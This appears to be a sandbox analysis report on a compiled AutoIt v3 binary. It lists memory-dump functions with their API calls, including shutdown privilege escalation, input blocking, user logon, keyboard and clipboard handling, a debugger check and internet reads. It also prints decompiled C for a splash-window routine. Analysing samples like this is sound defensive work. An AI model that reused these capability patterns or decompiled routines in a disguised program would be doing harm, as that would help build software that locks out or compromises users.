                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                • String ID:
                • API String ID: 3490752873-0
                • Opcode ID: 86eac929b10f32da6a75f321a1d8df174c125bfc9072d1b7a5a16360ebf2c3ea
                • Instruction ID: 4d190918310e806d00db9422572f6903172f75a72b021b93cfbb84b87bf0e456
                • Opcode Fuzzy Hash: 86eac929b10f32da6a75f321a1d8df174c125bfc9072d1b7a5a16360ebf2c3ea
                • Instruction Fuzzy Hash: 76516F71A0021ABBDB10DFA5CC84EAF777CAF49700F05C51AF515A7241DA78DA45CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004233A3, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004233B3
                • OpenProcessToken.ADVAPI32(00000000), ref: 004233BA
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004233CF
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004233F3
                • GetLastError.KERNEL32 ref: 004233F9
                • ExitWindowsEx.USER32(?,00000000), ref: 0042341C
                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 0042344B
                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0042345E
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                • String ID: SeShutdownPrivilege
                • API String ID: 2938487562-3733053543
                • Opcode ID: dc280398fd3bcac2e54245ffcecbe1c57cf5b3e37f0d4acbb84a44555a3cbd54
                • Instruction ID: 26e45139c53a4b043da90095ffd15cb1165153439473cecf43d134f8fe378c28
                • Opcode Fuzzy Hash: dc280398fd3bcac2e54245ffcecbe1c57cf5b3e37f0d4acbb84a44555a3cbd54
                • Instruction Fuzzy Hash: 6D21D771740204ABEB109FA4EC4EFBA777CEB04702F504095FE0DD61C1DABD99408668
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044A0FC, Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: f4023f0d7633e39e5a9f468fa8612488921d4d4f6bb02cc43e2d55dc646ed85a
                • Instruction ID: 051531582a97b4735d62f642228d58bfa74de96795a41cc717e50e7d9efcbc5c
                • Opcode Fuzzy Hash: f4023f0d7633e39e5a9f468fa8612488921d4d4f6bb02cc43e2d55dc646ed85a
                • Instruction Fuzzy Hash: A241BF726101059FD710EFA5EC89BAEB7A4FF14315F10856AFA09CB2A1DBB1E940CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004342E1, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 00434320
                • GetKeyboardState.USER32(?), ref: 00434335
                • SetKeyboardState.USER32(?), ref: 00434389
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004343B9
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004343DA
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00434426
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0043444B
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 797ffe0dd0257db8280baef5dc5ea1d5269b3c190d11f1f502e6f239c7fe3c07
                • Instruction ID: d6036a09f0410141df0f8a7a36a9f13de57e7228f46dd4117ede3677b43e53c7
                • Opcode Fuzzy Hash: 797ffe0dd0257db8280baef5dc5ea1d5269b3c190d11f1f502e6f239c7fe3c07
                • Instruction Fuzzy Hash: B851F6A06047D139F73282788845BF7BFA85F8A300F08968BF1D5166C3C3ACB994C769
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040A128, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00411EE1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00411EF6
                • UnhandledExceptionFilter.KERNEL32(pqH), ref: 00411F01
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00411F1D
                • TerminateProcess.KERNEL32(00000000), ref: 00411F24
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: pqH
                • API String ID: 2579439406-3851628631
                • Opcode ID: 76a4a1cb2b01e0a50a6e58789e026dfc9a796836f3f469b05f03d999b71467fd
                • Instruction ID: 30365eeef1e4ff0e4db8f98ef38b686c0ee9cfc6df37bf8d7e9ec5342245821f
                • Opcode Fuzzy Hash: 76a4a1cb2b01e0a50a6e58789e026dfc9a796836f3f469b05f03d999b71467fd
                • Instruction Fuzzy Hash: 9C21FEB44182048FD750DF64FEA86483BA0FB08310F6009BEF90887770E7B998858F0D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442408, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128filesleepCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • FindFirstFileW.KERNEL32(?,?), ref: 00442455
                • Sleep.KERNEL32(0000000A), ref: 00442481
                • FindNextFileW.KERNEL32(?,?), ref: 0044255F
                • FindClose.KERNEL32(?), ref: 00442575
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                • String ID: *.*
                • API String ID: 2786137511-438819550
                • Opcode ID: 4c724cb49aa6647ad89b2670bef91bca96b3c96a585777c43db9919d67efa025
                • Instruction ID: d2d5a101c081467a6772542e42e7faf52dbacc670dde7378d33dcc2e95f85a2e
                • Opcode Fuzzy Hash: 4c724cb49aa6647ad89b2670bef91bca96b3c96a585777c43db9919d67efa025
                • Instruction Fuzzy Hash: 2C41AD71A00219AFDF14DF68CD84AEFB7B4EF44300F54855AF908A7251D778AE85CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00423321, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicollmouse_event
                • String ID: DOWN
                • API String ID: 1033544147-711622031
                • Opcode ID: 596a05bca37152281f53ba00e005dd8cde10fd7c68228b4835bf4fc2c9ca1cf3
                • Instruction ID: 0163ec2d099f83383aea6db4697352a71666925dc5b5ab2e1961746422a59027
                • Opcode Fuzzy Hash: 596a05bca37152281f53ba00e005dd8cde10fd7c68228b4835bf4fc2c9ca1cf3
                • Instruction Fuzzy Hash: E0F0E5726947203AF80066943C02EF7735C8B11BA7F004022FE0CE52C0D9A92E1546FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00432D2D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • __time64.LIBCMT ref: 00432D3F
                  • Part of subcall function 004047D3: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00420DB1,00000000,?,?,00431DDE,?,00000001), ref: 004047DE
                  • Part of subcall function 004047D3: __aulldiv.LIBCMT ref: 004047FE
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Time$FileSystem__aulldiv__time64
                • String ID: @uI$DuI
                • API String ID: 2893107130-3537921471
                • Opcode ID: 65fee1ac54eef0fbcc29c377aa998a7d0912e58b1f4e58bdb1c3e86381179d98
                • Instruction ID: d8bd8dfaea2b50b4b561ebf83995aa1135b722c7663f9d4b0ceb52ac3c5caf8e
                • Opcode Fuzzy Hash: 65fee1ac54eef0fbcc29c377aa998a7d0912e58b1f4e58bdb1c3e86381179d98
                • Instruction Fuzzy Hash: 8C2190335705108BF320CF36DC45652B3E2EBE4310F268A7AD4A5973D5DAB96906CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00432285, Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                Download Yara Rule
                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 004322A5
                • InternetReadFile.WININET(?,00000000,?,?), ref: 004322DD
                  • Part of subcall function 00432252: GetLastError.KERNEL32 ref: 00432268
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 901099227-0
                • Opcode ID: ec4cd29b4f6d0e5263cabfa169e7c7294501a0cf11009abb59de10d5aa53b7a4
                • Instruction ID: 4a3e40c0030e6b9e75cfeac01c07d89ae59c2f2721b02ebe62889567e50ba740
                • Opcode Fuzzy Hash: ec4cd29b4f6d0e5263cabfa169e7c7294501a0cf11009abb59de10d5aa53b7a4
                • Instruction Fuzzy Hash: 0021A9716002047BE710EF55DD81FEB73ACFF98724F10C02BFA099A280D6B8E5458BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044A35D, Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                Download Yara Rule
                APIs
                • BlockInput.USER32(00000001), ref: 0044A378
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: a51f79615e51f01a02f12524a264e33fc699698ac8ec544b05808eca3a56fe77
                • Instruction ID: a48b1e316954c5df4f5936b9f5a421ca46725d2d45021d6a10ccbd5c27cd5536
                • Opcode Fuzzy Hash: a51f79615e51f01a02f12524a264e33fc699698ac8ec544b05808eca3a56fe77
                • Instruction Fuzzy Hash: D2E04F35240309ABD710AF65D948A66B7E8EF947A0F10C42AED4ACB351EB74E840CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426C61, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00426C83
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: LogonUser
                • String ID:
                • API String ID: 1244722697-0
                • Opcode ID: 342d56972a928b1cdd2608d3e8753838fac2bfe8944b0b0f0865d0af1e32a9ad
                • Instruction ID: afe27ffb825b5d6e714b34ea5a103c0cbaa18009da9d83564f382719990882ec
                • Opcode Fuzzy Hash: 342d56972a928b1cdd2608d3e8753838fac2bfe8944b0b0f0865d0af1e32a9ad
                • Instruction Fuzzy Hash: C7E012B626464EAFDB04CF68DC43EBF37ADE748710F004614BA16D7280C670E911CA74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004494D6, Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E004494D6(signed int __eax, void* _a4, void* _a8, struct HWND__* _a12) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				int _v40;
				char _v44;
				long _v48;
				short _v180;
				signed int _t151;
				struct HWND__* _t161;
				int _t173;
				int _t179;
				int _t196;
				int _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				int _t224;
				int _t227;
				struct HWND__* _t231;
				signed char _t251;
				void* _t260;
				void* _t261;
				void* _t266;
				struct HDC__* _t267;
				void* _t268;
				struct HWND__* _t269;
				struct HDC__* _t270;
				struct HWND__* _t271;
				long _t273;
				struct tagRECT* _t275;
				signed int _t276;
				int _t288;
				intOrPtr _t311;
				void* _t323;
				long _t335;
				int _t338;
				int _t339;
				void* _t341;
				long _t344;
				int _t347;
				int _t348;
				void* _t350;
				struct HWND__* _t351;
				void* _t353;

				_t151 = __eax | 0xffffffff;
				_v8 = 0x1f4;
				_v40 = 0x190;
				_v20 = _t151;
				_v16 = _t151;
				_v48 = 0;
				_v12 = 0x50000001;
				_t344 = 0x88c00000;
				_t335 = _t151 + 9;
				if( *0x4874fc != 0) {
					_t260 =  *0x487500;
					if(_t260 != 0) {
						DeleteObject(_t260);
						 *0x487500 = 0;
					}
					_t261 =  *0x4874f8;
					if(_t261 != 0) {
						DeleteObject(_t261);
						 *0x4874f8 = 0;
					}
					DestroyWindow( *0x4874fc);
					 *0x4874fc = 0;
				}
				if(_a12 == 2) {
					L36:
					return 0;
				} else {
					_t275 =  &_v36;
					GetWindowRect(GetDesktopWindow(), _t275);
					_t266 = _a4;
					if(_a8 >= 3) {
						_t311 =  *((intOrPtr*)(_t266 + 4));
						_t275 =  *(_t311 + 8);
						if(E003FC8A0(_t275) != 0xffffffff) {
							_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 8);
							_v8 = E003FC8A0(_t275);
						}
					}
					if(_a8 >= 4) {
						_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0xc);
						if(E003FC8A0(_t275) != 0xffffffff) {
							_t311 =  *((intOrPtr*)(_t266 + 4));
							_t275 =  *(_t311 + 0xc);
							_v40 = E003FC8A0(_t275);
						}
					}
					if(_a8 >= 5) {
						_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0x10);
						_v20 = E003FC8A0(_t275);
					}
					if(_a8 >= 6) {
						_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0x14);
						_v16 = E003FC8A0(_t275);
					}
					if(_a8 >= 7) {
						_t311 =  *((intOrPtr*)(_t266 + 4));
						_t275 =  *(_t311 + 0x18);
						if(E003FC8A0(_t275) != 0xffffffff) {
							_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0x18);
							_t251 = E003FC8A0(_t275);
							_v48 = _t251;
							if(_a12 == 1) {
								if((_t251 & 0x00000008) != 0) {
									_v12 = 0x50000002;
								}
								if((_t251 & 0x00000004) != 0) {
									_t275 = (_v12 & 0x00000002 | 0xa0000001) >> 1;
									_v12 = _t275;
								}
							}
							if((_t251 & 0x00000002) != 0) {
								_t335 = 0;
							}
							if((_t251 & 0x00000001) != 0) {
								_t344 = 0x88800000;
							}
							if((_t251 & 0x00000010) != 0) {
								_t344 = _t344 ^ 0x08000000;
							}
						}
					}
					_t276 = _t275 | 0xffffffff;
					if(_v20 == _t276) {
						asm("cdq");
						_v20 = _v36.right - _v8 - _t311 >> 1;
					}
					if(_v16 == _t276) {
						asm("cdq");
						_v16 = _v36.bottom - _v40 - _t311 >> 1;
					}
					SetRect( &_v36, 0, 0, _v8, _v40);
					AdjustWindowRectEx( &_v36, _t344, 0, _t335);
					_t161 = CreateWindowExW(_t335, L"AutoIt v3", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t266 + 4))))), _t344, _v20, _v16, _v36.right - _v36.left, _v36.bottom - _v36.top,  *0x487518, 0, 0, 0);
					 *0x4874fc = _t161;
					GetClientRect(_t161,  &_v36);
					_t347 = _v36.right - _v36.left;
					_t338 = _v36.bottom - _v36.top;
					_push(0);
					_push(0);
					_push(0);
					if(_a12 != 0) {
						_t339 = _t338 - 0x16;
						_t348 = _t347 - 0x16;
						_v8 = 0xc;
						_v40 = 0x190;
						_a12 = CreateWindowExW(0, L"static", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t266 + 4)) + 4))), _v12, 0xb, 0xb, _t348, _t339,  *0x4874fc, ??, ??, ??);
						_t267 = CreateDCW(L"DISPLAY", 0, 0, 0);
						SelectObject(_t267, GetStockObject(0x11));
						GetTextFaceW(_t267, 0x40,  &_v180);
						_v12 = GetDeviceCaps(_t267, 0x5a);
						DeleteDC(_t267);
						_t268 = _a8;
						__eflags = _t268 - 8;
						if(_t268 >= 8) {
							_t207 = E004010E1(E00443381( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x1c))));
							_t353 = _t353 + 4;
							__eflags = _t207 - 1;
							if(_t207 >= 1) {
								E00401487( &_v180, E00443381( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x1c))));
								_t353 = _t353 + 8;
							}
						}
						__eflags = _t268 - 9;
						if(_t268 >= 9) {
							_t202 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x20)));
							__eflags = _t202 - 6;
							if(_t202 >= 6) {
								_v8 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x20)));
							}
						}
						__eflags = _t268 - 0xa;
						if(_t268 < 0xa) {
							L49:
							_t173 = _v40;
						} else {
							_t272 = _a4;
							_t198 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x24)));
							__eflags = _t198;
							if(_t198 < 0) {
								goto L49;
							} else {
								_t199 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t272 + 4)) + 0x24)));
								__eflags = _t199 - 0x3e8;
								if(_t199 > 0x3e8) {
									goto L49;
								} else {
									_t173 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t272 + 4)) + 0x24)));
								}
							}
						}
						_t179 = CreateFontW((0xc71c71c7 * _v12 * _v8 >> 0x20 >> 4 >> 0x1f) + (0xc71c71c7 * _v12 * _v8 >> 0x20 >> 4), 0, 0, 0, _t173, 0, 0, 0, 1, 4, 0, 2, 0,  &_v180);
						_t269 = _a12;
						 *0x487500 = _t179;
						SendMessageW(_t269, 0x30, _t179, 1);
						__eflags = _v48 & 0x00000020;
						if((_v48 & 0x00000020) != 0) {
							_t270 = GetDC(_t269);
							_a8 = SelectObject(_t270,  *0x487500);
							E0043379E( &_v44, __eflags, _t270, E00443381( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 4))),  &_v44);
							_t323 = _a8;
							SelectObject(_t270, _t323);
							_t271 = _a12;
							ReleaseDC(_t271, _t270);
							_t288 = _v40;
							asm("cdq");
							_t196 = (_t339 - _t288 - _t323 >> 1) + 0xb;
							__eflags = _t196;
							MoveWindow(_t271, 0xb, _t196, _t348, _t288, 1);
						}
						ShowWindow( *0x4874fc, 4);
						__eflags = 0;
						return 0;
					} else {
						_a8 = 0;
						_a12 = CreateWindowExW(0, L"static", 0, 0x5000000e, 0, 0, _t347, _t338,  *0x4874fc, ??, ??, ??);
						_t350 = CreateFileW(E00443381( *((intOrPtr*)( *((intOrPtr*)(_t266 + 4)) + 4))), 0x80000000, 0, 0, 3, 0, 0);
						if(_t350 != 0xffffffff) {
							_t273 = GetFileSize(_t350, 0);
							_t341 = GlobalAlloc(2, _t273);
							ReadFile(_t350, GlobalLock(_t341), _t273,  &_v48, 0);
							GlobalUnlock(_t341);
							CloseHandle(_t350);
							__imp__CreateStreamOnHGlobal(_t341, 1,  &_v8);
							__imp__#418(_v8, 0, 0, 0x4729f8,  &_a8);
							_t224 = _v8;
							 *((intOrPtr*)( *((intOrPtr*)( *_t224 + 8))))(_t224);
							GlobalFree(_t341);
							_t227 = _a8;
							__eflags = _t227;
							if(_t227 == 0) {
								goto L36;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 0xc))))(_t227,  &_a4);
								_a4 = CopyImage(_a4, 0, 0, 0, 0x2000);
								_t231 = _a8;
								 *((intOrPtr*)( *((intOrPtr*)(_t231->i + 8))))(_t231);
								_t351 = _a12;
								SendMessageW(_t351, 0x172, 0, _a4);
								 *0x4874f8 = _a4;
								SetWindowPos(_t351, 0, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top, 0x20);
								ShowWindow( *0x4874fc, 4);
								__eflags = 0;
								return 0;
							}
						} else {
							goto L36;
						}
					}
				}
			}

















































                0x004494e0
                0x004494ec
                0x004494f3
                0x004494fa
                0x004494fd
                0x00449500
                0x00449507
                0x0044950e
                0x00449513
                0x00449516
                0x00449518
                0x00449525
                0x00449528
                0x0044952a
                0x0044952a
                0x00449534
                0x0044953b
                0x0044953e
                0x00449540
                0x00449540
                0x00449550
                0x00449556
                0x00449556
                0x00449564
                0x0044975a
                0x00449762
                0x0044956a
                0x0044956a
                0x00449575
                0x0044957f
                0x00449582
                0x00449584
                0x00449587
                0x00449592
                0x00449597
                0x0044959f
                0x0044959f
                0x00449592
                0x004495a6
                0x004495ab
                0x004495b6
                0x004495b8
                0x004495bb
                0x004495c3
                0x004495c3
                0x004495b6
                0x004495ca
                0x004495cf
                0x004495d7
                0x004495d7
                0x004495de
                0x004495e3
                0x004495eb
                0x004495eb
                0x004495f2
                0x004495f4
                0x004495f7
                0x00449602
                0x00449607
                0x0044960a
                0x00449613
                0x00449616
                0x0044961a
                0x0044961c
                0x0044961c
                0x00449625
                0x00449634
                0x00449636
                0x00449636
                0x00449625
                0x0044963b
                0x0044963d
                0x0044963d
                0x00449641
                0x00449643
                0x00449643
                0x0044964a
                0x0044964c
                0x0044964c
                0x0044964a
                0x00449602
                0x00449652
                0x00449658
                0x00449660
                0x00449665
                0x00449665
                0x0044966b
                0x00449673
                0x00449678
                0x00449678
                0x0044968b
                0x00449699
                0x004496d5
                0x004496e0
                0x004496e5
                0x004496f1
                0x004496f4
                0x004496fb
                0x004496fd
                0x004496ff
                0x00449701
                0x00449873
                0x00449877
                0x00449881
                0x00449888
                0x004498ad
                0x004498b8
                0x004498c2
                0x004498d2
                0x004498e2
                0x004498e5
                0x004498eb
                0x004498ee
                0x004498f1
                0x00449903
                0x00449908
                0x0044990b
                0x0044990e
                0x00449927
                0x0044992c
                0x0044992c
                0x0044990e
                0x0044992f
                0x00449932
                0x0044993d
                0x00449942
                0x00449945
                0x00449955
                0x00449955
                0x00449945
                0x00449958
                0x0044995b
                0x0044998e
                0x0044998e
                0x0044995d
                0x0044995d
                0x00449966
                0x0044996b
                0x0044996d
                0x00000000
                0x0044996f
                0x00449975
                0x0044997a
                0x0044997f
                0x00000000
                0x00449981
                0x00449987
                0x00449987
                0x0044997f
                0x0044996d
                0x004499c8
                0x004499ce
                0x004499d7
                0x004499dc
                0x004499e2
                0x004499e6
                0x004499f5
                0x00449a02
                0x00449a17
                0x00449a1c
                0x00449a24
                0x00449a2b
                0x00449a2f
                0x00449a35
                0x00449a3c
                0x00449a45
                0x00449a45
                0x00449a4c
                0x00449a4c
                0x00449a5a
                0x00449a62
                0x00449a68
